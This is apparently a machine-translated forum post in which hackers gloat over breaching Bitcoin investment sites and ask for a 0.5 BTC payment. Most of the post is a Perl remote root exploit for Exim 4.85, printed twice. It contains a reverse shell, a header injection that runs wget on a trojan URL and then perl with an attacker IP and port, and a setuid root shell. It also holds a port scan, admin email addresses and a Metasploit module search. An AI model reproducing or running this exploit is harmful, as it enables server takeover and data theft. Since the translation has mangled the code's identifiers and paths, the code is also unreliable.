Re: жулик был взломан | LOL | KARMA
хехе я сказал U Dont гребаный играть со мной!
где U "Понци" Теперь ?
некоторая информация к общественности
http://pastebin.com/VGcARfGe
ORT ГОСУДАРСТВЕННАЯ СЛУЖБА VERSION
21 / TCP открыт FTP Pure-FTPd
22 / TCP открыт SSH OpenSSH 5.3 (протокол 2.0)
26 / TCP закрыто rsftp
53 / TCP открыт tcpwrapped
80 / TCP открыт HTTP Nginx
110 / TCP открыт pop3 Довекот pop3d
143 / TCP открыт Dovecot IMAP IMAPD
443 / TCP открыт HTTP Nginx
465 / TCP Open SSL / SMTP Exim smtpd 4.85
993 / TCP Open SSL / IMAP Dovecot IMAPD
995 / TCP Open SSL / pop3 Dovecot pop3d
3306 / TCP открыт MySQL MySQL (несанкционированное)
8080 / TCP закрыт HTTP-прокси
хороший 465 / TCP Open SSL / SMTP Exim smtpd 4.85
код эксплойта в Perl:
ВБГ ядро ...
некоторые скриншоты
какая-то проблема, если у вас я не могу windraw все здесь
admin@money10.net
admin@14daily.com
admin@bitcoinfield.net
admin@profit12.com
admin@lucrebit.com
Wellcome speedy1987 во мне мире
DonT sarching У меня 20 firewole 10 физ и 5 Hahah VPS.
Теперь у всех косяк windraw у Monet, но если и не имеют навыков ...
это общественные Adres BTC: 112QrMgXdaYdSS3n2NnnNWris8feJuQvBk я не могу windraw у всех людей деньги просто положить здесь 0,5 Btc продвижение ист! Теперь я иду спать спокойной ночи всем!
pozdrowienia! польская элитная команда хакеров
где U "Понци" Теперь ?
некоторая информация к общественности
http://pastebin.com/VGcARfGe
ORT ГОСУДАРСТВЕННАЯ СЛУЖБА VERSION
21 / TCP открыт FTP Pure-FTPd
22 / TCP открыт SSH OpenSSH 5.3 (протокол 2.0)
26 / TCP закрыто rsftp
53 / TCP открыт tcpwrapped
80 / TCP открыт HTTP Nginx
110 / TCP открыт pop3 Довекот pop3d
143 / TCP открыт Dovecot IMAP IMAPD
443 / TCP открыт HTTP Nginx
465 / TCP Open SSL / SMTP Exim smtpd 4.85
993 / TCP Open SSL / IMAP Dovecot IMAPD
995 / TCP Open SSL / pop3 Dovecot pop3d
3306 / TCP открыт MySQL MySQL (несанкционированное)
8080 / TCP закрыт HTTP-прокси
хороший 465 / TCP Open SSL / SMTP Exim smtpd 4.85
код эксплойта в Perl:
Код:
#Exim 4,85 (RedHat / Centos / Debian) Удаленный Корень Exploit от Kingcope
#Modified версия Perl из Metasploit модуля
= Для комментариев
использовать эту оболочку подключить обратно, как "trojanurl" и убедитесь, что настроить Netcat,
---чик ---
$ Система = '/ бен / ш';
$ ARGC = @ ARGV;
если ($ ARGC! = 2) {
Распечатать "Использование: $ 0 [Хост] [Порт] \ п \ п";
умереть "Пример: $ 0 127.0.0.1 2121 \ п";
}
использовать гнездо;
использовать FileHandle;
Гнездо (РАЗЪЕМ, PF_INET, SOCK_STREAM, getprotobyname ( 'TCP')) или умереть печать "[-] Не удается решить проблему хоста \ п";
подключения (SOCKET, sockaddr_in ($ ARGV [1], inet_aton ($ ARGV [0]))) или умереть печати "[-] Не удается подключиться хост \ п";
РАЗЪЕМ->AutoFlush ();
открытый (STDIN, ">&РАЗЪЕМ");
открытый (STDOUT,">&РАЗЪЕМ");
открытый (STDERR,">&РАЗЪЕМ");
открыть файл, ">/var/spool/exim4/s.c";
печать FILE кв.кв {
#включают
#включают
ИНТ основной (интермедиат ARGC, символ * ARGV [])
{
УИП (0);
setgid (0);
setgroups (0, NULL);
execl ("/ Бен / ш", "ш", НОЛЬ);
}
};
закрыть файл;
система ("НКА /var/spool/exim4/s -о / вар / катушка / exim4 / с; гт /var/spool/exim4/s.c");
открыть файл, ">/tmp/e.conf";
распечатать файл "spool_directory = \ $ {бег {/ бен / Чаун корень: корень / вар / катушка / exim4 / s}} \ $ {{запустить / bin / CHMOD 4755 / вар / катушка / exim4 / s}}";
закрыть файл;
система ("Exim -C / TMP / e.conf -q; гт /tmp/e.conf");
система ("uname -a;");
система ("/ Вар / катушка / exim4 / с");
система ($ система);
---чик ---
= вырезать
использовать IO :: Socket;
если ($ # ARGV пе 3) {
Распечатать "./eximxpl <хост / IP> \ п";
Распечатать "Пример: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443 \ п";
Выход;
}
$ | = 1;
$ Троян = $ ARGV [1];
$ MyIP = $ ARGV [2];
$ Myport = $ ARGV [3];
$ Helohost = "abcde.com";
$ Max_msg = 52428800;
мой $ носка = IO :: Socket :: INET->новый (PeerAddr => $ ARGV [0],
PeerPort => "25",
Прото => 'TCP');
в то время как(<$ носка>) {
Распечатать;
если ($ _ = ~ / 220 /) {в прошлом;}
}
печать $ носка "EHLO $ helohost \ г \ п";
в то время как(<$ носка>) {
Распечатать;
если ($ _ = ~ / 250 Размер (\ d +) /) {
$ Max_msg = $ 1;
Распечатать "Установить размер до $ max_msg! \ п";
}
если ($ _ = ~ /^250.*Hello ([^ \ s] +) \ [([^ \]] +) \] /) {
$ Revdns = $ 1;
$ Saddr = $ 2;
}
если ($ _ = ~ / 250 /) {последний;}
}
если ($ revdns экв $ helohost) {
$ VV = "";
} Еще {
$ = $ Ст revdns. " ";
}
$ Ст. = "(" , $ Helohost. ")";
$ От = "корень \ @ local.com";
$ К = "почтмейстер \ @localhost";
$ MSG_LEN = $ max_msg + 1024 * 256;
$ Logbuffer_size = 8192;
$ Logbuffer = "YYYY-MM-DD HH: MM: SS XXXXXX-YYYYYY-ZZ отвергнута из <$ от> H = $ VV [$ saddr]: сообщение слишком большой: чтение = $ MSG_LEN макс = $ max_msg \ п";
$ Logbuffer. = "Конверт-с: <$ от>\ NEnvelope к: <$ к>\ п";
$ Наполнитель = "В" х (8 * 16);
$ Logbuffer_size - = 3;
для ($ к = 0; $ K<60; $ к ++) {
если (длина ($ logbuffer) >= $ Logbuffer_size) {последних;}
$ = Sprintf HDR ("Заголовок% 04d:% s \ п", $ К, $ наполнитель);
$ Newlen = длина ($ logbuffer) + длина ($ HDR);
если ($ newlen > $ Logbuffer_size) {
$ Newlen - = $ logbuffer_size;
$ Выкл = длина ($ ВСД) - $ newlen - 2 - 1;
$ = ЗиЬзЬг HDR ($ ВСД 0, $ выкл);
$ РВБ. = "\ п";
}
$ HDRs = $ РВБ.;
$ Logbuffer. = " " , $ HDR;
}
$ Hdrx = "HeaderX: ";
$ К2 = 3;
для ($ к = 1; $ K<= 200; $ K ++) {
если ($ k2 > 12) {
$ К2 = 3;
}
# $ Hdrx. = "\ $ {Бег {/ бен / ш -c «Exec / бен / ш -i <&$ k2 >&0 2>&0' }} ";
$ Hdrx. = "\ $ {Бег {/ бен / ш -с \"Exec / бен / ш -c «Wget $ троян -О /tmp/c.pl;perl /tmp/c.pl $ MyIP $ myport; сон 10000000' \"}} ";
$ K2 ++;
}
$ V = "" х 255. "\ п";
$ Тела = "";
в то время как (длина ($ тела) < $ MSG_LEN) {
$ Тела = $ v.
}
$ Тела = зиЬзЬги ($ тела, 0, $ MSG_LEN);
печать $ носка "MAIL FROM: <$ от>\ Г \ п";
$ V = <$ носка>;
печать $ v;
печать $ носка "RCPT TO: <$ к>\ Г \ п";
$ V = <$ носка>;
печать $ v;
печать $ носка "ДАННЫЕ \ г \ п";
$ V = <$ носка>;
печать $ v;
Распечатать "Отправка большого буфера, пожалуйста, подождите ... \ п";
печать $ носка $ HDRs;
печать $ носка $ hdrx. "\ п";
печать $ носка $ тела;
печать $ носка "\ Г \ п. \ Г \ п";
$ V = <$ носка>;
печать $ v;
печать $ носка "MAIL FROM: <$ от>\ Г \ п";
$ V = <$ носка>;
печать $ v;
печать $ носка "RCPT TO: <$ к>\ Г \ п";
в то время как (1) {};
#Modified версия Perl из Metasploit модуля
= Для комментариев
использовать эту оболочку подключить обратно, как "trojanurl" и убедитесь, что настроить Netcat,
---чик ---
$ Система = '/ бен / ш';
$ ARGC = @ ARGV;
если ($ ARGC! = 2) {
Распечатать "Использование: $ 0 [Хост] [Порт] \ п \ п";
умереть "Пример: $ 0 127.0.0.1 2121 \ п";
}
использовать гнездо;
использовать FileHandle;
Гнездо (РАЗЪЕМ, PF_INET, SOCK_STREAM, getprotobyname ( 'TCP')) или умереть печать "[-] Не удается решить проблему хоста \ п";
подключения (SOCKET, sockaddr_in ($ ARGV [1], inet_aton ($ ARGV [0]))) или умереть печати "[-] Не удается подключиться хост \ п";
РАЗЪЕМ->AutoFlush ();
открытый (STDIN, ">&РАЗЪЕМ");
открытый (STDOUT,">&РАЗЪЕМ");
открытый (STDERR,">&РАЗЪЕМ");
открыть файл, ">/var/spool/exim4/s.c";
печать FILE кв.кв {
#включают
#включают
ИНТ основной (интермедиат ARGC, символ * ARGV [])
{
УИП (0);
setgid (0);
setgroups (0, NULL);
execl ("/ Бен / ш", "ш", НОЛЬ);
}
};
закрыть файл;
система ("НКА /var/spool/exim4/s -о / вар / катушка / exim4 / с; гт /var/spool/exim4/s.c");
открыть файл, ">/tmp/e.conf";
распечатать файл "spool_directory = \ $ {бег {/ бен / Чаун корень: корень / вар / катушка / exim4 / s}} \ $ {{запустить / bin / CHMOD 4755 / вар / катушка / exim4 / s}}";
закрыть файл;
система ("Exim -C / TMP / e.conf -q; гт /tmp/e.conf");
система ("uname -a;");
система ("/ Вар / катушка / exim4 / с");
система ($ система);
---чик ---
= вырезать
использовать IO :: Socket;
если ($ # ARGV пе 3) {
Распечатать "./eximxpl <хост / IP>
Распечатать "Пример: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443 \ п";
Выход;
}
$ | = 1;
$ Троян = $ ARGV [1];
$ MyIP = $ ARGV [2];
$ Myport = $ ARGV [3];
$ Helohost = "abcde.com";
$ Max_msg = 52428800;
мой $ носка = IO :: Socket :: INET->новый (PeerAddr => $ ARGV [0],
PeerPort => "25",
Прото => 'TCP');
в то время как(<$ носка>) {
Распечатать;
если ($ _ = ~ / 220 /) {в прошлом;}
}
печать $ носка "EHLO $ helohost \ г \ п";
в то время как(<$ носка>) {
Распечатать;
если ($ _ = ~ / 250 Размер (\ d +) /) {
$ Max_msg = $ 1;
Распечатать "Установить размер до $ max_msg! \ п";
}
если ($ _ = ~ /^250.*Hello ([^ \ s] +) \ [([^ \]] +) \] /) {
$ Revdns = $ 1;
$ Saddr = $ 2;
}
если ($ _ = ~ / 250 /) {последний;}
}
если ($ revdns экв $ helohost) {
$ VV = "";
} Еще {
$ = $ Ст revdns. " ";
}
$ Ст. = "(" , $ Helohost. ")";
$ От = "корень \ @ local.com";
$ К = "почтмейстер \ @localhost";
$ MSG_LEN = $ max_msg + 1024 * 256;
$ Logbuffer_size = 8192;
$ Logbuffer = "YYYY-MM-DD HH: MM: SS XXXXXX-YYYYYY-ZZ отвергнута из <$ от> H = $ VV [$ saddr]: сообщение слишком большой: чтение = $ MSG_LEN макс = $ max_msg \ п";
$ Logbuffer. = "Конверт-с: <$ от>\ NEnvelope к: <$ к>\ п";
$ Наполнитель = "В" х (8 * 16);
$ Logbuffer_size - = 3;
для ($ к = 0; $ K<60; $ к ++) {
если (длина ($ logbuffer) >= $ Logbuffer_size) {последних;}
$ = Sprintf HDR ("Заголовок% 04d:% s \ п", $ К, $ наполнитель);
$ Newlen = длина ($ logbuffer) + длина ($ HDR);
если ($ newlen > $ Logbuffer_size) {
$ Newlen - = $ logbuffer_size;
$ Выкл = длина ($ ВСД) - $ newlen - 2 - 1;
$ = ЗиЬзЬг HDR ($ ВСД 0, $ выкл);
$ РВБ. = "\ п";
}
$ HDRs = $ РВБ.;
$ Logbuffer. = " " , $ HDR;
}
$ Hdrx = "HeaderX: ";
$ К2 = 3;
для ($ к = 1; $ K<= 200; $ K ++) {
если ($ k2 > 12) {
$ К2 = 3;
}
# $ Hdrx. = "\ $ {Бег {/ бен / ш -c «Exec / бен / ш -i <&$ k2 >&0 2>&0' }} ";
$ Hdrx. = "\ $ {Бег {/ бен / ш -с \"Exec / бен / ш -c «Wget $ троян -О /tmp/c.pl;perl /tmp/c.pl $ MyIP $ myport; сон 10000000' \"}} ";
$ K2 ++;
}
$ V = "" х 255. "\ п";
$ Тела = "";
в то время как (длина ($ тела) < $ MSG_LEN) {
$ Тела = $ v.
}
$ Тела = зиЬзЬги ($ тела, 0, $ MSG_LEN);
печать $ носка "MAIL FROM: <$ от>\ Г \ п";
$ V = <$ носка>;
печать $ v;
печать $ носка "RCPT TO: <$ к>\ Г \ п";
$ V = <$ носка>;
печать $ v;
печать $ носка "ДАННЫЕ \ г \ п";
$ V = <$ носка>;
печать $ v;
Распечатать "Отправка большого буфера, пожалуйста, подождите ... \ п";
печать $ носка $ HDRs;
печать $ носка $ hdrx. "\ п";
печать $ носка $ тела;
печать $ носка "\ Г \ п. \ Г \ п";
$ V = <$ носка>;
печать $ v;
печать $ носка "MAIL FROM: <$ от>\ Г \ п";
$ V = <$ носка>;
печать $ v;
печать $ носка "RCPT TO: <$ к>\ Г \ п";
в то время как (1) {};
ВБГ ядро ...
Код:
корень @ поташ: ~ # msfconsole
[*] Запуск консоли Metasploit Framework ... \
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
http://metasploit.pro
Easy фишинг: Настройка шаблонов электронной почты, целевые страницы и слушателей
в Metasploit Pro - узнать больше о http://rapid7.com/metasploit
= [Metasploit v4.11.0-2015013101 [Ядро: 4.11.0.pre.2015013101 API: 1.0.0]]
+ -- --= [1389 бреши - 788 вспомогательных - 223 сообщения]
+ -- --= [356 полезная нагрузка - 37 кодеры - 8 NOPS]
+ -- --= [Free Metasploit Pro испытание: http://r-7.co/trymsp]
ВБГ > поиск Exim
[!] База данных не подключен или кэш не построен, используя медленный поиск
Модули Matching
================
Имя Disclosure Дата Ранг Описание
---- --------------- ---- -----------
эксплуатируют / Linux / SMTP / exim4_dovecot_exec 2015-01-03 отличный Exim и Dovecot Command Configuration небезопасной инъекции
эксплуатируют / Unix / SMTP / exim4_string_format 2013-12-07 отлично exim4 string_format Функция Heap переполнения буфера
ВБГ >
[*] Запуск консоли Metasploit Framework ... \
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
http://metasploit.pro
Easy фишинг: Настройка шаблонов электронной почты, целевые страницы и слушателей
в Metasploit Pro - узнать больше о http://rapid7.com/metasploit
= [Metasploit v4.11.0-2015013101 [Ядро: 4.11.0.pre.2015013101 API: 1.0.0]]
+ -- --= [1389 бреши - 788 вспомогательных - 223 сообщения]
+ -- --= [356 полезная нагрузка - 37 кодеры - 8 NOPS]
+ -- --= [Free Metasploit Pro испытание: http://r-7.co/trymsp]
ВБГ > поиск Exim
[!] База данных не подключен или кэш не построен, используя медленный поиск
Модули Matching
================
Имя Disclosure Дата Ранг Описание
---- --------------- ---- -----------
эксплуатируют / Linux / SMTP / exim4_dovecot_exec 2015-01-03 отличный Exim и Dovecot Command Configuration небезопасной инъекции
эксплуатируют / Unix / SMTP / exim4_string_format 2013-12-07 отлично exim4 string_format Функция Heap переполнения буфера
ВБГ >
некоторые скриншоты
какая-то проблема, если у вас я не могу windraw все здесь
admin@money10.net
admin@14daily.com
admin@bitcoinfield.net
admin@profit12.com
admin@lucrebit.com
Wellcome speedy1987 во мне мире
DonT sarching У меня 20 firewole 10 физ и 5 Hahah VPS.
Теперь у всех косяк windraw у Monet, но если и не имеют навыков ...
это общественные Adres BTC: 112QrMgXdaYdSS3n2NnnNWris8feJuQvBk я не могу windraw у всех людей деньги просто положить здесь 0,5 Btc продвижение ист! Теперь я иду спать спокойной ночи всем!
pozdrowienia! польская элитная команда хакеров
